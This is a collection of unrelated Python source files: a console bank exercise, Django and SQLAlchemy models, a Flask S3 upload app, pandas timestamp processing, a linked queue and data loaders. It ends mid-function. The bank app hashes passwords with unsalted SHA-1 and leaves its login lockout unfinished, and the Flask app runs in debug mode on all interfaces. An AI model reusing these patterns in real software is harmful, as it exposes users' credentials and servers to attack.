|
[
"[email protected]"
] | |
4aad67a6a71395c673ae5f5856acede9f780ea61
|
ba268419a2d14261cec3dc5ef3aed325ec464f40
|
/Week5/Money in the bank/start.py
|
9e143450c57aea958af5d7dae3eec9d0ccc2844d
|
[] |
no_license
|
Hristiyan-Andreev/HackBuglaria
|
a12063cabb3f25f85d35b387eed4af6b521aeb99
|
64c362a135386b577d4a860e5f13fbbb506268b4
|
refs/heads/master
| 2021-01-19T07:43:52.987409 | 2014-12-07T12:49:08 | 2014-12-07T12:49:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,078 |
py
|
import sql_manager
import hashlib
import getpass
import datetime
def main_menu():
    """Top-level console loop: register, login (SHA-1-hashed password), help, exit."""
    faillogin = 0  # consecutive failed login attempts (across all usernames)
    print("Welcome to our bank service. You are not logged in. \nPlease register or login")
    while True:
        command = input("$$$>")
        if command == 'register':
            username = input("Enter your username: ")
            password = setpass(username)
            sql_manager.register(username, password)
            print("Registration Successfull")
        elif command == 'login':
            username = input("Enter your username: ")
            # NOTE(review): failtime is fetched but never checked afterwards —
            # the lockout enforcement looks unfinished; confirm intended behavior.
            failtime = sql_manager.getfailtime(username)
            password = getpass.getpass("Enter your password: ")
            #password = input("Enter your password: ")
            #bytepass = ' '.join(format(x, 'b') for x in bytearray(password))
            hashpass = hashlib.sha1(password.encode())
            logged_user = sql_manager.login(username, hashpass.hexdigest())
            if logged_user:
                logged_menu(logged_user)
            else:
                faillogin += 1
                if faillogin >= 5:
                    # After 5 failures, record the minute of the last failure.
                    failuser = username
                    now = datetime.datetime.now()
                    failmin = now.minute
                    sql_manager.setfailtime(failuser, failmin)
                print("Login failed")
        elif command == 'help':
            print("login - for logging in!")
            print("register - for creating new account!")
            print("exit - for closing program!")
        elif command == 'exit':
            break
        else:
            print("Not a valid command")
def logged_menu(logged_user):
    """Post-login console loop: account info, password change, user message."""
    print("Welcome you are logged in as: " + logged_user.get_username())
    while True:
        command = input("Logged>>")
        if command == 'info':
            print("You are: " + logged_user.get_username())
            print("Your id is: " + str(logged_user.get_id()))
            print("Your balance is:" + str(logged_user.get_balance()) + '$')
        elif command == 'changepass':
            # NOTE(review): setpass expects a username string but receives the
            # user object here — its `username in password` check would raise;
            # confirm what type sql_manager.login returns.
            new_pass = setpass(logged_user)
            sql_manager.change_pass(new_pass, logged_user)
        elif command == 'change-message':
            new_message = input("Enter your new message: ")
            sql_manager.change_message(new_message, logged_user)
        elif command == 'show-message':
            print(logged_user.get_message())
        elif command == 'help':
            print("info - for showing account info")
            print("changepass - for changing passowrd")
            print("change-message - for changing users message")
            print("show-message - for showing users message")
def setpass(username):
    """Prompt repeatedly (via getpass) for a password satisfying the policy
    and return its SHA-1 hex digest.

    Policy enforced: length >= 9, at least one lowercase letter, at least one
    uppercase letter, at least one special symbol, and the password must not
    contain the username.  (The prompt also mentions a digit requirement, but
    no digit check was ever enforced; that behavior is kept as-is.)
    """
    message = "Your password must be:\n- More than 8 symbol\n -Contain at least one capital letter\
\n -Contain at east one lower letter\n -Contain at least one special symbol\n -Contain at least one digit"
    print(message)
    Chars = set(["!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "_"])
    while True:
        password = getpass.getpass("Enter your password: ")
        if (len(password) < 9):
            error = "\nYour password is too short, it must be at least 8 symbols!"
            print(error)
        # BUG FIX: the original used `not (c for c in password if c.islower())`;
        # a generator object is always truthy, so the lowercase/uppercase checks
        # could never fire.  any() actually inspects the characters.
        elif not any(c.islower() for c in password):
            error = "\nYour password has no lowercase symbols!"
            print(error)
        elif not any(c.isupper() for c in password):
            error = "\nYour password has no uppercase symbols!"
            print(error)
        elif not any(c in Chars for c in password):
            error = "\nYour password has no sepcial symbols!"
            print(error)
        elif (username in password):
            error = "\nYour password must not contain your username!"
            print(error)
        else:
            break
    hashpass = hashlib.sha1(password.encode())
    return hashpass.hexdigest()
def main():
    """Create the clients table (if needed) and start the top-level menu."""
    sql_manager.create_clients_table()
    main_menu()

if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
c308ae66daa33b8c226cc21d524b24a164a41d1d
|
abbc40722942a449e1f1fcb802d573228cc4b64c
|
/prototype.py
|
d6ed8d6c82dae80e5b84450487e12ff5da9da0fe
|
[] |
no_license
|
dwaard/pylogger
|
6176d177b2d7b77d1aaab30a5c4497c30d65298b
|
ca9d9b0421fd09dadd5b499afae345b03d39b194
|
refs/heads/master
| 2021-01-17T17:31:53.916167 | 2017-02-23T19:31:40 | 2017-02-23T19:31:40 | 82,963,536 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 297 |
py
|
import matplotlib.pyplot as plt
from receiver import Receiver
from serialreader import Reader
from logger import Logger
from plotter import Plotter

# Wire the pipeline: the Receiver pulls samples from the serial Reader and
# fans them out to the Logger and to a Plotter drawing on the matplotlib axes.
fig, axes = plt.subplots()
r = Receiver(Reader(), Logger(), Plotter(axes))
r.start()
# Show the live plot window (blocks until the window is closed).
plt.legend()
plt.show()
|
[
"[email protected]"
] | |
c5420358fb87484239026919e290e881a7b4c6c4
|
2ce0c37ac7d9beeac23db688f97a1f502b92d13a
|
/store/models/store.py
|
878b20d11d588de233e55c8908f1c894374734b0
|
[] |
no_license
|
AmrElsayedEG/inventory-system
|
0cdb0634b33117b13bfcae8642f979448d831369
|
d4bc483612c3b721918d75f24ab0d7fa29b78ce3
|
refs/heads/main
| 2023-08-20T22:32:25.113740 | 2021-10-04T08:55:44 | 2021-10-04T08:55:44 | 413,344,692 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 261 |
py
|
from django.db import models
class Store(models.Model):
    """A physical store location."""
    name = models.CharField(max_length=100)
    address = models.CharField(max_length=200)
    # Optional geo data stored as free-form JSON — presumably lat/lng; the
    # shape is not enforced here (confirm against callers).
    coordinates = models.JSONField(blank=True, null=True)
    def __str__(self) -> str:
        return self.name
|
[
"[email protected]"
] | |
a560d10713bc976b978431314f53a75111c1555a
|
3aa8222bb2edc93c9202ccbcf6f331cdf73cd5a2
|
/FundRatingNSDL/nsdl_extraction/setup.py
|
ac0e1546b51b54b85c28ad5f48c2c3952b296cc5
|
[] |
no_license
|
pavithra-ft/ft-automation
|
a977809823e587efd596b02e3a8286f887d12116
|
946e1c35b785bfc3ea31d5903e021d4bc99fe302
|
refs/heads/main
| 2023-04-24T19:54:28.478577 | 2021-05-11T17:53:08 | 2021-05-11T17:53:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 237 |
py
|
# Automatically created by: scrapyd-deploy
from setuptools import setup, find_packages

# Minimal packaging stub so scrapyd can egg-ify the spider project; the
# 'scrapy' entry point tells Scrapy where to find the settings module.
setup(
    name='project',
    version='1.0',
    packages=find_packages(),
    entry_points={'scrapy': ['settings = nsdl_extraction.settings']},
)
|
[
"[email protected]"
] | |
a25d41807d5e355c5a7487c2a5485d6b49d1dbdb
|
331897b7af41f719edba54587b01407d20b5fc07
|
/backend/models.py
|
9c52d2e988b0fa6018b1beec112ff1dbe070c076
|
[] |
no_license
|
JaysesS/Hackathon
|
8ceb023e753479ef8eb64a2b4d4302f784df82ed
|
dff2afa5db9163e2f14a26013156c9fe80af3255
|
refs/heads/master
| 2023-07-26T06:23:11.445218 | 2021-08-29T12:00:42 | 2021-08-29T12:00:42 | 400,645,929 | 0 | 0 | null | 2021-08-29T12:00:43 | 2021-08-27T22:10:38 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 6,593 |
py
|
from typing import List, Optional
from flask import g
from datetime import datetime
from sqlalchemy import Column, ForeignKey, Integer, String, Boolean, Sequence, Index, func, create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import backref, relationship, remote, foreign, sessionmaker
from sqlalchemy import func
from sqlalchemy_utils import LtreeType, Ltree
from sqlalchemy_utils.types.ltree import LQUERY
import json
from schemas.user import UserChildrenSchema, UserSchema
from config import Config
Base = declarative_base()
# Engine for the configured database; sessions are created via get_session().
engine = create_engine(Config.SQLALCHEMY_DATABASE_URI,
                       **Config.SQLALCHEMY_ENGINE_OPTIONS)
# Shared sequence used to pre-allocate User ids (needed to build ltree paths).
id_seq = Sequence("nodes_id_seq")
class User(Base):
    """An org-chart user stored as a node of a Postgres ltree hierarchy."""
    __tablename__ = "user"

    id = Column(Integer, id_seq, primary_key=True)
    name = Column(String, nullable=False)
    position = Column(String, nullable=False)
    # Materialized path of ancestor ids, e.g. "1.4.9" (ltree).
    path = Column(LtreeType, nullable=False)
    parent = relationship(
        "User",
        # The parent is the node whose path equals this path minus its last label.
        primaryjoin=(remote(path) == foreign(func.subpath(path, 0, -1))),
        backref="children",
        viewonly=True,
    )

    def __init__(self, name, position, parent=None):
        # Draw the id from the sequence eagerly so it can go into the ltree path.
        _id = engine.execute(id_seq)
        self.id = _id
        self.name = name
        self.position = position
        ltree_id = Ltree(str(_id))
        # Roots use their own id as path; children extend the parent's path.
        self.path = ltree_id if parent is None else parent.path + ltree_id

    __table_args__ = (Index("ix_nodes_path", path, postgresql_using="gist"),)

    def show_json(self):
        """Pretty-print this node (with children) as JSON to stdout."""
        schema = UserChildrenSchema()
        print(json.dumps(schema.dump(self), indent=4))

    def to_json(self):
        """Serialize this node (with children) to a plain dict."""
        schema = UserChildrenSchema()
        return schema.dump(self)

    def delete(self):
        """Delete this node in the request-scoped session and commit."""
        g.session.delete(self)
        g.session.commit()

    @staticmethod
    def nodes_to_json(nodes: List["User"]) -> dict:
        """Serialize a list of nodes (with children) to plain dicts."""
        schema = UserChildrenSchema()
        return schema.dump(nodes, many=True)

    @classmethod
    def get_flat_list(cls, list = None) -> List[dict]:
        """Serialize every user without children.  (`list` parameter is unused.)"""
        schema = UserSchema()
        return schema.dump(g.session.query(User).all(), many=True)

    @classmethod
    def get_by_level(cls, level: int) -> List["User"]:
        """Return all nodes at the given depth in the tree (root level is 1)."""
        return g.session.query(cls).filter(
            func.nlevel(cls.path) == level).all()

    @classmethod
    def get_by_id(cls, id: int) -> "User":
        """Return the node with the given id, or None."""
        return g.session.query(cls).filter_by(id=id).first()

    @classmethod
    def get_by_name(cls, name: str) -> "User":
        """Return the first node with the given name, or None."""
        return g.session.query(cls).filter_by(name=name).first()

    @classmethod
    def insert_node(cls, parent_id: int, name: str, position: str) -> Optional["User"]:
        """Create a child under parent_id; returns None when the parent is missing."""
        parent = cls.get_by_id(parent_id)
        if parent:
            node = cls(name=name, position=position, parent=parent)
            g.session.add(node)
            g.session.commit()
            return node
        return None

    def __repr__(self):
        return 'User({})'.format(self.name)
class Task(Base):
    """A unit of work in a named process, owned by one user and optionally
    assigned by another."""
    __tablename__ = "task"

    id = Column(Integer, nullable=False, primary_key=True)
    name = Column(String, nullable=False, unique=False)
    process_name = Column(String, nullable=False, unique=False)
    # *_time columns hold integer epoch timestamps (see stop()).
    start_time = Column(Integer, nullable=False)
    due_time = Column(Integer, nullable=False)
    end_time = Column(Integer, nullable=True)
    priority = Column(Integer, nullable=False)
    var_count = Column(Integer, nullable=False)
    owner_id = Column(Integer, ForeignKey('user.id'), nullable=False)
    assigner_id = Column(Integer, ForeignKey('user.id'), nullable=True)
    owner = relationship(User, foreign_keys=[owner_id], backref='tasks_own')
    assigner = relationship(
        User, foreign_keys=[assigner_id], backref='tasks_assign')
    started = Column(Boolean, server_default='t', default=False)
    # Latch: once a task has ever been started it cannot be started again.
    was_started = Column(Boolean, server_default='t', default=False)

    def __repr__(self) -> str:
        return f"Task({self.process_name} -> {self.name})"

    def is_started(self):
        """Return True while the task is running."""
        return self.started

    def change_state(self, state):
        """Dispatch "start" to start(); anything else stops the task."""
        if state == "start":
            return self.start()
        return self.stop()

    def start(self):
        """Start the task once; returns self, or None if it was ever started."""
        if not self.was_started:
            self.started = True
            self.was_started = True
            g.session.commit()
            return self
        # TASK WAS STARTED BEFORE
        return None

    def stop(self):
        """Stop a running task, recording end_time; returns None if not running."""
        if self.started:
            self.started = False
            self.end_time = datetime.now().timestamp()
            g.session.commit()
            return self
        # STOP STOPED TASK??)
        return None

    @classmethod
    def get_by_id(cls, id: int) -> "Task":
        """Return the task with the given id, or None."""
        return g.session.query(cls).filter_by(id=id).first()
def get_session():
    """Create a fresh SQLAlchemy session bound to the module-level engine."""
    factory = sessionmaker(bind=engine)
    return factory()
# To create a tree like the example shown
# at the top of this post:
# cats = Node("cats")
# big = Node("big", parent=cats)
# small = Node("small", parent=cats)
# wild = Node("wild", parent=small)
# domestic = Node("domestic", parent=small)
# session.add_all((cats, big, small, wild, domestic))
# for big_cat in ("lion", "tiger", "jaguar"):
# session.add(Node(big_cat, parent=big))
# for small_wildcat in ("ocelot", "bobcat"):
# session.add(Node(small_wildcat, parent=wild))
# for domestic_cat in ("persian", "bengal", "shorthair"):
# session.add(Node(domestic_cat, parent=domestic))
# session.flush()
# To retrieve a whole subtree:
# whole_subtree = session.query(Node).filter(
# Node.path.descendant_of(domestic.path)).all()
# print('Whole subtree:', whole_subtree)
# [domestic, persian, bengal, shorthair]
# Get only the third layer of nodes:
# third_layer = session.query(Node).filter(func.nlevel(Node.path) == 3).all()
# print('Third layer:', third_layer)
# [wild, domestic, lion, tiger, jaguar]
# Get all the siblings of a node:
# shorthair = session.query(Node).filter_by(name="shorthair").one()
# siblings = session.query(Node).filter(
# # We can use Python's slice notation on ltree paths:
# Node.path.descendant_of(shorthair.path[:-1]),
# func.nlevel(Node.path) == len(shorthair.path),
# Node.id != shorthair.id,
# ).all()
# print('Siblings of shorthair:', siblings)
# [persian, bengal]
# Using an LQuery to get immediate children of two parent nodes at different depths:
# query = "*.%s|%s.*{1}" % (big.id, wild.id)
# lquery = expression.cast(query, LQUERY)
# immediate_children = session.query(Node).filter(Node.path.lquery(lquery)).all()
# print('Immediate children of big and wild:', immediate_children)
# [lion, tiger, ocelot, jaguar, bobcat]
|
[
"[email protected]"
] | |
55449c7a1ec4597c4f9f4692300b0cefdab77ba4
|
ad8590e6049d88ef0829f80c0ce427f299a1c719
|
/backend/models/ProjectModels.py
|
77bddc490f223b6622b28e0c17a4915f955d1ffc
|
[] |
no_license
|
liujue520/VotingManagement
|
33ccca02039b7de0f3fb3aa7c5392b0afdde3918
|
8c5b812e68514062d2f34963917d7679309abdca
|
refs/heads/master
| 2022-12-23T03:39:45.929603 | 2020-09-18T01:23:37 | 2020-09-18T01:23:37 | 292,767,540 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,779 |
py
|
from django.db import models
import uuid
class Project(models.Model):
    """A votable project belonging to a ProjectGroup."""
    ProjectId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    ProjectName = models.CharField(max_length=32, verbose_name="项目名称", default="输入项目名")
    Created = models.DateTimeField(auto_now_add=True,verbose_name='创建时间')
    Update = models.DateTimeField(auto_now=True,verbose_name='更新时间')
    StartingTime = models.DateField(auto_now=False, auto_now_add=False, verbose_name="开始时间")
    EndTime = models.DateField(auto_now=False, auto_now_add=False, verbose_name="结束时间")
    # NOTE(review): auto_created=True on a plain IntegerField is unusual, and
    # default=None will fail on save unless a number is always supplied — confirm intent.
    ProjectNumber = models.IntegerField(verbose_name="项目号", blank=True, auto_created=True,default=None)
    ProjectGroup = models.ForeignKey('ProjectGroup', on_delete=models.CASCADE,default=None)
    class Meta:
        db_table='Project'
        verbose_name='Project_项目表'
        verbose_name_plural=verbose_name
    def __str__(self):
        return self.ProjectName
class Rule(models.Model):
    """A voting rule; attached to project groups via RuleProjectGroup."""
    RuleId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    RuleName = models.CharField(max_length=32, verbose_name="规则名", default="规则名")
    Created = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
    Update = models.DateTimeField(auto_now=True, verbose_name='更新时间')
    class Meta:
        db_table = 'Rule'
        verbose_name = 'Project_规则表'
        verbose_name_plural = verbose_name
    def __str__(self):
        return self.RuleName
class ProjectGroup(models.Model):
    """A group of projects; linked to rules through the RuleProjectGroup join table."""
    ProjectGroupId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    ProjectGroupName = models.CharField(max_length=32, verbose_name="项目组名", default="项目组名")
    Rule = models.ManyToManyField(Rule, through='RuleProjectGroup')
    Created = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
    Update = models.DateTimeField(auto_now=True, verbose_name='更新时间')
    class Meta:
        db_table='ProjectGroup'
        verbose_name='Project_项目组表'
        verbose_name_plural=verbose_name
    def __str__(self):
        return self.ProjectGroupName
class RuleProjectGroup(models.Model):
    """Explicit through-model for the ProjectGroup <-> Rule many-to-many."""
    RuleProjectGroupId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    Rule= models.ForeignKey(Rule, on_delete=models.CASCADE)
    ProjectGroup= models.ForeignKey(ProjectGroup, on_delete=models.CASCADE)
    Created = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
    Update = models.DateTimeField(auto_now=True, verbose_name='更新时间')
    class Meta:
        db_table='RuleProjectGroup'
        verbose_name='Project_规则组表'
        verbose_name_plural=verbose_name
|
[
"[email protected]"
] | |
d46378b10661fadbaff034e5e9e9071f4bb301b6
|
88c4be065cb3b6904994b1718a75736c87241633
|
/web/app.py
|
ff37699e91caa6afb592a37b5597b54886c5cd7d
|
[] |
no_license
|
RomUriy/Animation-Creator
|
b0d82710e21c7c01efc6863c086f9a8bb54e501a
|
98cdb2af014925c2fe99bb8805b76c3b12d1fcd9
|
refs/heads/master
| 2022-08-10T15:58:17.322825 | 2018-06-14T15:01:51 | 2018-06-14T15:01:51 | 137,210,209 | 0 | 0 | null | 2022-07-07T22:58:54 | 2018-06-13T12:06:43 |
Python
|
UTF-8
|
Python
| false | false | 1,524 |
py
|
import json
import os

import boto3
from flask import Flask
from flask import render_template, request, flash
from flask import redirect
from flask_bootstrap import Bootstrap

from media.s3_storage import S3MediaStorage
from media.name_generator import generate_name
app = Flask(__name__)
Bootstrap(app)

# S3-backed storage for uploaded photos; bucket name comes from the environment.
s3 = boto3.resource('s3')
media_storage = S3MediaStorage(s3, os.getenv('APP_BUCKET_NAME'))
# In-process list of uploaded photo names (shared mutable state, per worker).
photos_list=[]

sqs = boto3.resource('sqs', region_name="eu-central-1")
requestQueue = sqs.get_queue_by_name(
    QueueName=os.getenv("APP_QUEUE_NAME")
)
@app.route("/")
def hello():
    """Landing page: render the upload form."""
    return render_template(
        'upload_files.html'
    )
@app.route("/upload", methods=['POST'])
def handle_upload():
    """Store one uploaded photo in S3 under a generated name and re-render
    the photo list.

    BUG FIX: the missing-file path calls redirect(), which was never imported
    from flask and would raise NameError at runtime; the import is now added
    at the top of the module.
    """
    if 'uploaded_file' not in request.files:
        flash('No file part')
        return redirect(request.url)
    uploaded_file = request.files['uploaded_file']
    destination_name = generate_name(uploaded_file.filename)
    media_storage.store(
        dest=destination_name,
        source=uploaded_file
    )
    photos_list.append(destination_name)
    return prepare()
@app.route("/proceed", methods=["POST"])
def proceed_animation():
    """Queue an animation request (email + uploaded photo names) on SQS."""
    ani_request = {
        "email": request.form['email'],
        "photos": photos_list
    }
    requestQueue.send_message(
        MessageBody=json.dumps(ani_request)
    )
    # NOTE(review): photos_list is not cleared after queueing — a later
    # request would resend the earlier photos; confirm that is intended.
    return render_template(
        'proceed.html'
    )
@app.route("/prepare")
def prepare():
    """Show the list of photos uploaded so far."""
    return render_template(
        'prepare.html',
        invitation="Photo list",
        photos=photos_list
    )
if __name__ == '__main__':
    # Development server only; use a real WSGI server in production.
    app.run(host="0.0.0.0", port=8080, debug=True)
|
[
"[email protected]"
] | |
c097371ef72a1eee6842648f528eab90ff75039d
|
60b76b2904b3f38d5f12e07c007fd2902e34d599
|
/importdf_backup.py
|
249083b97ee3994828022ab004744fdc9abbea4d
|
[] |
no_license
|
nzminki0621/diveroid
|
a53485674a255dbd8fb7dae68ec78ce7b2097cff
|
3fb7cbed2b3f621f98318f8518681253a0a9ce6c
|
refs/heads/master
| 2023-02-04T06:28:12.782823 | 2020-12-26T16:47:34 | 2020-12-26T16:47:34 | 313,373,606 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,066 |
py
|
import pandas as pd
import numpy as np
from datetime import datetime as dt
import datetime
import timezone as tz
def timeplus(row):
    """Shift row.datetime64 by the US state's UTC offset (hours) from tz.us_time.

    Rows whose geo_region has no entry in the US table (non-US rows, NaN
    regions) keep their existing human_time unchanged.
    """
    try:
        return row.datetime64 + datetime.timedelta(hours=tz.us_time[row.geo_region])
    # Narrowed from a bare except: only a missing/unhashable region key is
    # expected here; anything else should surface instead of being swallowed.
    except (KeyError, TypeError):
        return row.human_time
def timeplus_world(row):
    """Shift row.datetime64 by the country's UTC offset (hours) from tz.world_time.

    Rows whose geo_country has no entry in the world table keep their
    existing human_time unchanged.
    """
    try:
        return row.datetime64 + datetime.timedelta(hours=tz.world_time[row.geo_country])
    # Narrowed from a bare except: only a missing/unhashable country key is
    # expected here; anything else should surface instead of being swallowed.
    except (KeyError, TypeError):
        return row.human_time
def divide_by_mil(i):
    """Scale a raw microsecond timestamp down to seconds (divide by 1e6)."""
    micros_per_second = 1000000
    return i / micros_per_second
def df_proc(df):
    # Convert the raw microsecond event_timestamp into np.datetime64 and derive
    # a timezone-corrected human_time column on the frame (mutated in place).
    df['datetime64'] = df.event_timestamp.map(int).map(divide_by_mil).map(dt.fromtimestamp).map(np.datetime64)
    df['human_time'] = df['datetime64']
    df['human_time'] = df.apply(timeplus_world, axis=1)  # world timezone correction
    df['human_time'] = df.apply(timeplus, axis=1)  # US per-state correction (applied second, overrides)
    first_visit = df[df.event_name == 'first_visit']
    click_target = df[df.event_name == 'click_target']
    # Returns the mutated frame plus the first_visit / click_target subsets.
    return df, first_visit, click_target
def df_us(df):
    """Filter to US rows with a known region; also return the first_visit
    and click_target subsets of those rows."""
    us_rows = df[df.geo_country == 'United States'].reset_index(drop=True)
    us_rows = us_rows.dropna(subset=['geo_region'])
    visits = us_rows.loc[us_rows['event_name'] == 'first_visit']
    clicks = us_rows.loc[us_rows['event_name'] == 'click_target']
    return us_rows, visits, clicks
# Build one concatenated frame over 2020-11-10..15 plus one frame per day,
# each expanded into (full df, first_visit subset, click_target subset).
df_all = pd.concat([pd.read_csv('20201110.csv'),pd.read_csv('20201111.csv'),pd.read_csv('20201112.csv'),pd.read_csv('20201113.csv'),pd.read_csv('20201114.csv'),pd.read_csv('20201115.csv')])
df_all, df_first_visit, df_click_target = df_proc(df_all)
df10 = pd.read_csv('20201110.csv')
df10, df10_first_visit, df10_click_target = df_proc(df10)
df11 = pd.read_csv('20201111.csv')
df11, df11_first_visit, df11_click_target = df_proc(df11)
df12 = pd.read_csv('20201112.csv')
df12, df12_first_visit, df12_click_target = df_proc(df12)
df13 = pd.read_csv('20201113.csv')
df13, df13_first_visit, df13_click_target = df_proc(df13)
df14 = pd.read_csv('20201114.csv')
df14, df14_first_visit, df14_click_target = df_proc(df14)
df15 = pd.read_csv('20201115.csv')
df15, df15_first_visit, df15_click_target = df_proc(df15)
|
[
"[email protected]"
] | |
89ff61bb886405458fa3dfd861415c75323119ed
|
d25590632c1c6873c871b75d9ab7ee6a6b06abec
|
/Lab 8/linkedQFile.py
|
b200bbda86445cd7dde60c2a700a29baa5c2fccd
|
[] |
no_license
|
karolinvalaszkai/sjnl
|
384f941427f099e24e3514a094c060f3c6ffd647
|
442fbf485c3521c7f74dacc80d1e0b0b8a5e56d2
|
refs/heads/master
| 2020-08-24T15:50:53.911101 | 2019-11-14T11:15:31 | 2019-11-14T11:15:31 | 216,858,293 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,866 |
py
|
"""värdet=None, dvs pekar inte på någonting."""
"""En kö kan implementeras likadant som en stack. Nu vill man ha en pekare i var ände på kön.
Den som hette top i stacken kallar vi first och så har vi last som pekar på sista noden. Där ska nämligen nya noder stoppas in."""
"""single linked"""
"""OBS gör dequeue o sen enqueue, ska funka med trollkarlsprogrammet"""
class Node():
    """Singly linked list node: a value plus a pointer to the next node."""
    def __init__(self, value):
        self.data = value
        self.next = None


class LinkedQ():
    """FIFO queue backed by a singly linked list with head and tail pointers."""

    def __init__(self):
        self.__first = None  # head: the next element to dequeue
        self.__last = None   # tail: where new elements are appended

    def __str__(self):
        return str(self.__first.data) + "\n"

    def enqueue(self, x):
        """Append x at the back of the queue."""
        node = Node(x)
        if self.__first is None:
            # Empty queue: the new node becomes the head as well.
            self.__first = node
        else:
            self.__last.next = node
        self.__last = node

    def dequeue(self):
        """Remove and return the front element ('Bugg' when the queue is empty)."""
        if self.__first is None:
            return 'Bugg'
        front = self.__first.data
        self.__first = self.__first.next
        return front

    def isEmpty(self):
        """Return True when the queue holds no elements, False otherwise."""
        return self.__first is None

    def peek(self):
        """Return the front value without removing it (None when empty)."""
        if self.__first is not None:
            return self.__first.data
|
[
"[email protected]"
] | |
460f676c069089996fb607db849fb892c0b4ab8a
|
c2e16633921d1efe584d93d769eaa7892a2fd8f3
|
/list,advanced/Messaging.py
|
aa33649a6ed9732f8fa8110516c633e59d131daa
|
[] |
no_license
|
yosifnandrov/softuni-stuff
|
bd53d418fe143ea4633a5488c1f80648da0b9ef7
|
2a76e5aee2029edf901634750d28cf153d73ece3
|
refs/heads/main
| 2023-04-17T19:53:30.254790 | 2021-05-06T11:33:39 | 2021-05-06T11:33:39 | 364,884,782 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 511 |
py
|
# First input line: space-separated digit groups; second line: the hidden message.
number = input().split()
message = input()
def get_sum(n):
    """Return the sum of the digits in n (a string or sequence of digit chars).

    Replaces the manual accumulator loop with the builtin sum() over a
    generator — same result, idiomatic form.
    """
    return sum(int(digit) for digit in n)
# Decode: for each digit group, its digit sum indexes a character of the
# remaining message; print that character and remove it from the message.
for i in number:
    summary = get_sum(i)
    for l in range(len(message)):
        if l == summary:
            print(message[l], end="")
            message = message[0:l:] + message[l + 1::]
            break
        elif l == len(message) - 1:
            # Digit sum exceeds the message length: wrap around by rebinding
            # l to (sum - length), which indexes from the front again.
            l = summary - len(message)
            print(message[l], end="")
            message = message[0:l:] + message[l + 1::]
|
[
"[email protected]"
] | |
415a144beeaa3c13258e2a371ca7213ee2725062
|
9489ec26c3a727dcac117d751f7f27244c6e5399
|
/chat/models.py
|
6ba68d798c2ad91ccf9a37dc5685d170d4b95aea
|
[] |
no_license
|
Vkotl/Message-board
|
4e8c97233c0996f939a78761b97d2b0c998d2c4c
|
001557be91a8f0835fb4dd657a00af79ed7626d1
|
refs/heads/master
| 2021-04-09T11:44:06.680561 | 2018-03-17T07:32:05 | 2018-03-17T07:32:05 | 125,601,988 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 659 |
py
|
from django.db import models
from django.contrib.auth.models import User
class Message (models.Model):
    """A direct message from one user to another."""
    sender = models.ForeignKey(User, related_name='Sender', on_delete=models.CASCADE)
    mess_receiver = models.ForeignKey(User, related_name='Receiver', on_delete=models.CASCADE)
    content = models.CharField('Message', max_length=500)
    pub_date = models.DateTimeField('Date sent')
    def __str__(self):
        # Multi-line dump: sender, receiver, content, and HH:MM send time.
        temp = 'Sent from: ' + self.sender.username + '\n' + 'Sent to: ' + self.mess_receiver.username + '\n'
        temp += self.content + '\n' + 'Sent on: ' + '{0}:{1}'.format(self.pub_date.hour, self.pub_date.minute)
        return temp
|
[
"[email protected]"
] | |
3d146d8f05f7cdc1a43b00c4fc38aba49bc611ba
|
5afbf2c62dbd7ca41b3b1d791371cb720575b2a8
|
/supervised/preprocess/prepro_train.py
|
6fdeb4e79e130ae457589589964ea95365fc373e
|
[] |
no_license
|
andy-wagner/kb2vec
|
4a92a405940efb6c26d122f21f95686f1690fe8f
|
a91d4c84cedb0f890442d1e776562c3d4212000a
|
refs/heads/master
| 2022-02-06T17:16:49.450411 | 2019-05-29T07:39:15 | 2019-05-29T07:39:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,972 |
py
|
import supervised.preprocess.prepro_util as prepro_util
import numpy as np
from gensim.models import Doc2Vec
from sqlitedict import SqliteDict
from nltk.tokenize import word_tokenize
from random import shuffle
def load_chunkid2contextid(path=None):
    """Read a tab-separated "chunk id<TAB>context id" file into a dict (str -> int)."""
    if path is None:
        path='/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/idmaps/chunkid2contextid.txt'
    mapping = {}
    with open(path) as handle:
        for row in handle:
            chunk_id, context_id = row.split('\t')
            mapping[chunk_id] = int(context_id)
    return mapping
def load_context_vec(path=None):
    """Load the precomputed context vectors (.npy) as a numpy array."""
    default = '/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/vectors/context_vecs.npy'
    return np.load(path if path is not None else default)
def load_doc2vec(path=None):
    """Load the pretrained Wikipedia Doc2Vec model, memory-mapped read-only."""
    if path is None:
        path = '/Users/sevgili/Ozge-PhD/wikipedia-doc2vec/all-dim100/wikipedia_document_dim100_with_wikicorpus.doc2vec'
    return Doc2Vec.load(path, mmap='r')
def load_longabs(path=None):
    """Open the DBpedia long-abstracts SqliteDict (autocommit disabled)."""
    if path is None:
        path='/Users/sevgili/Ozge-PhD/DBpedia-datasets/outputs/databases/long_abstracts.db'
    return SqliteDict(path, autocommit=False)
def load_graphid2url(path=None):
    """Open the graph-id -> URL lookup SqliteDict (autocommit disabled)."""
    if path is None:
        path='/Users/sevgili/Ozge-PhD/DBpedia-datasets/outputs/databases/intersection_nodes_lookup_inv.db'
    return SqliteDict(path, autocommit=False)
def load_wikiid2nnid(extension_name=None):
    """returns a map from wiki id to neural network id (for the entity embeddings)"""
    wikiid2nnid = dict()  # wikiid is string, nnid is integer
